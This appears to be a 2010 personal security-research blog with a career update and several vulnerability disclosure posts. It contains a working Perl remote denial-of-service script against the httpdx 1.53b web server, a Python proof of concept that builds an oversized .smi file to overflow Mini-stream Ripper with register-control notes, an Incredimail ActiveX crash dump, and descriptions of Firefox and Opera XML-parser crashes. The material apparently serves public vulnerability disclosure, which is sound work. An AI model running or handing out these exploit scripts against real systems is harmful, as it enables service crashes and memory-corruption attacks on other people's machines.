Posted by schaba on June 15, 2010
Hey guys it’s being a long longtime,some of my blog readers might think where i was all these days. well i was away from blogsphere for my degree final year exam.
After completiong of a degree in computer science and commerce applications at Osmania university, i decide make my career as a Network Professional.Though i have completed many courses like CCNA,CCNP,MCSE,MCITP,MCDBA i don’t have any certificate from those vendor’s,to make career in competitive filed of Networking i think its good to get some Certificates which helps validate and prove my experience and knowledge in using different products and solutions. After discussing with some experienced friends in the field of Networking i start with Microsoft MCITP Windows Server 2008 Administrator exam.
Last week successfully i completed all the Necessary exams to get MCITP windows server 2008 Administrator Certificate and now i am Microsoft Certified IT Professional (MCITP) Enterprise Administrator.
And now i am looking forward to do CCNA exam soon.
/schaba
Posted by schaba on April 3, 2010
while fuzzing incredimail activeX controle i ran into this activeX bug. I don’t have much clue how to exploit it. I know this is really lame.but if anyone else can give me much information about this lemme know. Link to exploit db
Debugging info
————–
Exception Code: ACCESS_VIOLATION
Disasm: 678914AE MOV EDX,[ECX] (ImSpoolU.dll)
Seh Chain:
————————————————–
1 678AE129 ImSpoolU.dll
2 678AE3C0 ImSpoolU.dll
3 678AE6D0 ImSpoolU.dll
4 1682950 VBSCRIPT.dll
5 7C839AD8 KERNEL32.dll
Called From Returns To
————————————————–
ImSpoolU.678914AE 8458BEC
Registers:
————————————————–
EIP 678914AE -> Asc: AUTH
EAX 018BDA90 -> Asc: AUTH
EBX 01C00048 -> 678B83EC
ECX 00000000
EDX 0018A812 -> F00DBAAD
EDI 00000006
ESI 018BDA90 -> Asc: AUTH
EBP 77124C1B -> 8B55FF8B
ESP 0013ED24 -> BFA7C790
Block Disassembly:
————————————————–
6789149C CALL 678A14A0
678914A1 MOV [ESI+4],EAX
678914A4 MOV ESI,[ESI+4]
678914A7 JMP SHORT 678914AB
678914A9 XOR ESI,ESI
678914AB MOV ECX,[EBX+18]
678914AE MOV EDX,[ECX] <--- CRASH
678914B0 MOV EAX,[EDX+18]
678914B3 PUSH 0
678914B5 PUSH EDI
678914B6 PUSH ESI
678914B7 CALL EAX
678914B9 MOV ESI,EAX
678914BB CMP ESI,-1
678914BE JNZ SHORT 678914D2
ArgDump:
--------------------------------------------------
EBP+8 0574C085
EBP+12 D1FC408B
EBP+16 04C25DE8
EBP+20 90909000
EBP+24 FF8B9090
EBP+28 53EC8B55
Stack Dump:
--------------------------------------------------
13ED24 90 C7 A7 BF B8 DA 8B 01 48 00 C0 01 48 00 C0 01 [........H...H...]
13ED34 00 00 00 00 C9 0B 04 80 00 00 00 00 80 ED 13 00 [................]
13ED44 29 E1 8A 67 FF FF FF FF 3A 28 89 67 48 00 C0 01 [...g.......gH...]
13ED54 78 ED 13 00 A4 A6 8B 67 C8 0B 04 80 01 00 00 00 [.......g........]
13ED64 D0 C7 A7 BF 70 50 C0 01 FF FF FF FF 48 00 C0 01 [....pP......H...]
Posted by schaba on February 24, 2010
saw this poc for httpdx from exploit db and thought fuzz that program and found a Dos vulnerability in it.
The vulnerability is caused due to an error in multi-socket.This can be exploited to crash the HTTP service.
proof of concept in action
$ ./htppd.pl 192.168.2.1 80
[+] Author : d3b4g
[+] Soft : httpdx1.53b Remote DoS
[+] Sending request…
[-]Done!
exploit code
#!/usr/bin/perl
use IO::Socket;
print "[+] Author : d3b4g\n";
print "[+] Soft : httpdx1.53b Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage:
\n";
print "[-] Exemple: file.pl 192.168.2.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
print $socket "GET \x11 HTTP/1.0\n\r\n";
}
Posted by schaba on January 25, 2010
I published 3 vulnerabilities past days and coudn’t get a time to update.so here it is.
Firefox 3.6 (XML parser) Memory Corruption PoC
Mozilla Firefox 3.6 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.
proof of concept exploit-db
Opera 10.10 (XML parser) Denial of Service
After opening the opera.html browser hang for a while and crush.same bug in firefox too :d
This vulnerability cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.
proof of concept exploit-db
Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC
#!/usr/bin/python
# Tested on: win XPsp3
# webpage: d3b4g.info
#EAX 00E1C880
#EDX 00000001
#EBX 41414141------------------------------------------------
#ESP 000D198C
#EBP 00E1C880 controle over registers
#ESI 41414141------------------------------------------------
#EDI 00E1C880
#EIP 00431302 Ripper.00431302
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 0 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 0 DS 0023 32bit 0(FFFFFFFF)
chars = "A"*90000
crush = "\x41\x41\x41\x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()
proof of concept exploit-db
I found a interesting bug in IE8 while testing my sexy fuzzer which I’m developing, will update it later after digging into it.
That’s all foalk’s